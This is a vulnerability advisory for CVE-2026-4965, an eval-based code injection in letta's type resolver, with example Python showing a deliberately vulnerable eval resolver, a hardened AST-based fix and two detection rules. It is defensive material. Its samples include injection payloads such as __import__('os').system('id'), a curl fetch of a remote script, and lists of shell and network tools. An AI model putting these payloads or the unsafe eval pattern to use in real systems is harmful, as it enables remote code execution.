letta-ai letta 0.16.4 Remote Code Injection Vulnerability (CVE-2026-4965)
letta-ai letta version 0.16.4 contains a remote code injection vulnerability (CVE-2026-4965) in the resolve_type function of ast_parsers.py, stemming from improper neutralization of directives in dynamically evaluated code, allowing unauthenticated remote attackers to execute arbitrary code.
letta-ai letta version 0.16.4 is vulnerable to remote code injection (CWE-95, improper neutralization of directives in dynamically evaluated code) in the resolve_type function of letta/functions/ast_parsers.py. This vulnerability, identified as CVE-2026-4965, results from an incomplete fix for CVE-2025-6101. An unauthenticated, remote attacker can exploit the flaw by supplying crafted input that is evaluated as code. A public exploit is available, increasing the risk of widespread…
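As an added illustration of the bug class (this is not Letta's code and not the exact resolve_type logic): a resolver that turns an annotation string such as "dict[str, int]" into a runtime type by handing it to eval() executes whatever the caller sends, and restricting the namespace passed to eval() does not help because eval() inserts the real builtins when the globals dict has no "__builtins__" key. The hardened version parses the string with ast and rebuilds only the node kinds a type hint may contain; anything else is refused rather than falling back to evaluation. The allowlist, function names and payloads are assumptions; requires Python 3.9+.

```python
import ast
import typing
from typing import Any

# Hypothetical allowlist: the only names an annotation may reference.
ALLOWED_TYPE_NAMES: dict[str, Any] = {
    "int": int, "str": str, "float": float, "bool": bool, "bytes": bytes,
    "list": list, "dict": dict, "tuple": tuple, "set": set,
    "Any": typing.Any, "Optional": typing.Optional, "Union": typing.Union,
    "List": typing.List, "Dict": typing.Dict,
}


def resolve_type_unsafe(annotation: str) -> Any:
    """CWE-95 pattern (deliberately vulnerable): attacker-controlled text reaches eval().

    The globals dict only holds type names, but eval() adds the real builtins
    to any globals dict lacking a "__builtins__" key, so __import__ is reachable.
    """
    return eval(annotation, dict(ALLOWED_TYPE_NAMES))  # noqa: S307


def _build(node: ast.expr) -> Any:
    """Rebuild a type object from the AST, allowing only type-hint grammar."""
    if isinstance(node, ast.Name):
        if node.id not in ALLOWED_TYPE_NAMES:
            raise ValueError(f"unknown type name: {node.id}")
        return ALLOWED_TYPE_NAMES[node.id]
    if isinstance(node, ast.Constant) and node.value is None:  # Optional[x], x | None
        return type(None)
    if isinstance(node, ast.Subscript):  # list[int], dict[str, int], Optional[int]
        origin = _build(node.value)
        if isinstance(node.slice, ast.Tuple):
            params: Any = tuple(_build(elt) for elt in node.slice.elts)
        else:
            params = _build(node.slice)
        return origin[params]
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.BitOr):  # int | None (3.10+)
        return _build(node.left) | _build(node.right)
    # Call, Attribute, Lambda, comprehensions, ... are never part of a type hint.
    raise ValueError(f"disallowed syntax in annotation: {type(node).__name__}")


def resolve_type_safe(annotation: str) -> Any:
    """Hardened resolver: parse, validate the tree, build the type by hand.

    No code is executed. An unexpected node is an error, not a fallback to eval().
    """
    tree = ast.parse(annotation, mode="eval")  # SyntaxError on non-expressions
    return _build(tree.body)


def is_accepted(annotation: str) -> bool:
    """True if the hardened resolver accepts the annotation string."""
    try:
        resolve_type_safe(annotation)
        return True
    except (ValueError, SyntaxError):
        return False


if __name__ == "__main__":
    # Constructed payload: harmless, but proves arbitrary code ran in the unsafe path.
    print(resolve_type_unsafe("__import__('os').getpid()"))
    print(resolve_type_safe("dict[str, list[int]]"))
    print(is_accepted("__import__('os').getpid()"))
```

The check that matters in review is the last branch of _build: a resolver that validates some node types and then still calls eval() on the original string has not removed the sink, which is how a fix for this class of bug ends up incomplete.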
Detection coverage (2 rules)
Detect Suspicious Process Spawned By Web Application (severity: high)
Detects processes spawned by web application processes that are not part of normal operation (shells, downloaders, network tools), which may indicate exploitation of a code injection or command execution vulnerability.
Detect Web Server Request with Suspicious Parameters (severity: medium)
Detects web server requests to specific endpoints whose parameters carry markers of code injection attempts.
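As an added example, not the platform's own rules (their queries are not on this page): a minimal version of both detections run over constructed sample telemetry. The web-server process names, the /api/tools path, the injection markers and the log lines are all assumptions; the one design point worth copying is that request parameters are URL-decoded before matching, since an encoded payload would otherwise slip past a raw substring match.

```python
import re
from urllib.parse import unquote_plus

# --- Rule 1: suspicious process spawned by a web application -------------------
WEB_APP_PARENTS = {"uvicorn", "gunicorn", "python", "python3", "node", "php-fpm", "httpd", "nginx"}
INTERPRETER_PARENTS = {"python", "python3", "node"}  # only "web" if the cmdline shows a server
SERVER_CMDLINE = re.compile(r"uvicorn|gunicorn|fastapi|flask|express", re.I)
SHELL_AND_NET_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat",
                          "socat", "perl", "id", "whoami"}

# Constructed process-creation events, in the shape an EDR or auditd pipeline emits.
PROCESS_EVENTS = [
    {"host": "app-1", "parent_image": "/usr/bin/python3", "parent_cmd": "python3 -m uvicorn app:app",
     "image": "/bin/sh", "cmd": "sh -c 'id'"},
    {"host": "app-1", "parent_image": "/usr/bin/python3", "parent_cmd": "python3 -m uvicorn app:app",
     "image": "/usr/bin/curl", "cmd": "curl http://203.0.113.9/x.sh"},
    {"host": "app-1", "parent_image": "/usr/sbin/cron", "parent_cmd": "/usr/sbin/cron -f",
     "image": "/bin/sh", "cmd": "sh -c 'logrotate'"},          # benign: parent is not a web app
    {"host": "app-1", "parent_image": "/usr/bin/python3", "parent_cmd": "python3 -m uvicorn app:app",
     "image": "/usr/bin/python3", "cmd": "python3 -c 'import app'"},  # benign: worker respawn
]


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def web_app_spawns(events: list[dict]) -> list[dict]:
    """Return events where a web-application process spawned a shell or network tool."""
    hits = []
    for ev in events:
        parent = basename(ev["parent_image"])
        is_web_app = parent in WEB_APP_PARENTS and (
            parent not in INTERPRETER_PARENTS or SERVER_CMDLINE.search(ev.get("parent_cmd", "")))
        if is_web_app and basename(ev["image"]) in SHELL_AND_NET_CHILDREN:
            hits.append(ev)
    return hits


# --- Rule 2: web request with code-injection markers in its parameters --------
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d+)')
INJECTION_MARKERS = re.compile(
    r"__import__|__builtins__|__subclasses__|__class__|__globals__"
    r"|\b(?:eval|exec|compile)\s*\(|os\.system|subprocess|lambda\s*:", re.I)
WATCHED_PATHS = ("/api/tools",)  # hypothetical endpoint that feeds a type resolver

# Constructed access-log lines (combined log format); payloads are URL-encoded as a client would send them.
ACCESS_LOG = [
    '10.0.0.7 - - [01/Mar/2026:12:00:01 +0000] "POST /api/tools?type=list%5Bint%5D HTTP/1.1" 200 81',
    '198.51.100.23 - - [01/Mar/2026:12:00:09 +0000] "POST /api/tools?type=__import__%28%27os%27%29.system%28%27id%27%29 HTTP/1.1" 200 81',
    '198.51.100.23 - - [01/Mar/2026:12:00:12 +0000] "GET /api/tools?type=%28%29.__class__.__base__.__subclasses__%28%29 HTTP/1.1" 200 81',
    '10.0.0.7 - - [01/Mar/2026:12:00:15 +0000] "GET /healthz HTTP/1.1" 200 2',
]


def injection_requests(lines: list[str]) -> list[dict]:
    """Return parsed requests to watched paths whose decoded query carries injection markers."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = unquote_plus(m["uri"])          # decode first, then match
        path, _, query = uri.partition("?")
        if path.startswith(WATCHED_PATHS) and INJECTION_MARKERS.search(query):
            hits.append({"src": m["src"], "ts": m["ts"], "method": m["method"], "uri": uri})
    return hits


if __name__ == "__main__":
    for ev in web_app_spawns(PROCESS_EVENTS):
        print("RULE1", ev["host"], ev["parent_cmd"], "->", ev["cmd"])
    for req in injection_requests(ACCESS_LOG):
        print("RULE2", req["src"], req["method"], req["uri"])
```

Rule 1 deliberately does not treat a bare python3 parent as a web application; without the command-line check, every maintenance script on the host would match, and worker respawns by the server itself are excluded by the child allowlist rather than by the parent test.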